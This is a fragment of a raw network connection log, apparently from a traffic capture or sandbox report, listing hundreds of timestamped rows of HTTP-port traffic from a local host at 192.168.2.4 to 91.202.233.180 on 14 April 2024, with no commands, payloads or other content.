Apr 14, 2024 08:45:42.081746101 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081769943 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081792116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081814051 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081834078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081856012 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081881046 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081899881 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081923008 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081948996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081969023 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.081991911 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082015038 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082036018 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082058907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082081079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082099915 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082123041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082143068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082166910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082187891 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082209110 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082226992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082251072 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082277060 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082298994 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082319021 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082341909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082362890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082381010 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082402945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082423925 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082444906 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082468033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082489014 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082508087 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082529068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082555056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082568884 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082598925 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082619905 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082647085 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082678080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082699060 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082721949 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082743883 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082766056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082788944 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082809925 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082833052 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082847118 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082874060 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082895041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082917929 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082942009 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082963943 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.082986116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083010912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083030939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083053112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083070040 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083096027 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083117962 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083137035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083158970 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083182096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083199024 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083221912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083242893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083267927 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083295107 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083317041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083338022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083362103 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083384037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083405018 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083430052 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083450079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083463907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083492041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083512068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083535910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083549976 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083580971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083596945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083620071 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083646059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083667040 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083688021 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083709955 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083729982 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083754063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083772898 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083795071 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083817959 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083833933 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083857059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083879948 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083905935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083930016 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083950996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083973885 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.083997965 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084014893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084038019 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084059954 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084083080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084108114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084120035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084150076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084162951 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084188938 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084213972 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084239006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084264994 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084279060 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084304094 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084331989 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084345102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084372997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084394932 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084413052 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084435940 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084458113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084482908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084502935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084528923 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084551096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084569931 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084603071 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084618092 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084645033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084667921 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084691048 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084705114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084729910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084752083 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084773064 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084791899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084815979 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084836960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084861040 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084882975 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084901094 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084923983 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084944963 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084969044 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.084990978 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085010052 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085033894 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085048914 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085074902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085095882 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085118055 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085144043 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085165977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085189104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085208893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085230112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085253000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085275888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085299969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085323095 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085336924 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085362911 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085382938 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085403919 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085428953 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085443020 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085474014 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085494995 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085515976 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085535049 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085561991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085585117 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085604906 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085625887 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085648060 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085661888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085689068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085705996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085730076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085753918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085776091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085794926 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085819006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085850000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085861921 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085887909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085912943 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085927010 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085953951 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085977077 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.085999012 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086019039 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086036921 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086075068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086095095 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086119890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086153984 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086170912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086196899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086220980 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086240053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086266994 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086282015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086309910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086330891 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086352110 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086369991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086400986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086412907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086436987 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086462021 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086479902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086563110 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086596966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086620092 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086648941 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086672068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086695910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086713076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086739063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086756945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086787939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086810112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086833000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086853981 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086875916 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086891890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086920977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086941957 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086967945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.086992025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087016106 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087028980 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087057114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087074995 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087102890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087127924 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087155104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087177992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087203979 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087224007 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087251902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087274075 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087297916 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087321043 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087344885 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087368965 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087393999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087413073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087445021 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087466955 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087493896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087517977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087543964 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087558985 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087590933 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087610006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087637901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087660074 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087687016 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087706089 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087743998 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087764025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087795973 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087810040 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087840080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087862968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087888002 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087909937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087935925 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087960958 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.087991953 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088010073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088038921 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088063002 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088090897 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088113070 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088140011 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088161945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088188887 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088211060 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088239908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088253975 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088287115 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088306904 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088350058 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088371992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088399887 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088423014 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088450909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088474989 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088505030 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088527918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088551044 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088574886 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088599920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088620901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088645935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088663101 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088692904 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088716984 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088743925 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088762999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088790894 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088813066 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088840961 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088862896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088888884 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088905096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088933945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088951111 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088980913 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.088999033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089032888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089046955 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089068890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089097023 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089123964 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089145899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089169025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089190960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089217901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089238882 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089266062 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089281082 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089308977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089333057 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089358091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089380026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.089402914 CEST	49741	80	192.168.2.4	91.202.233.180
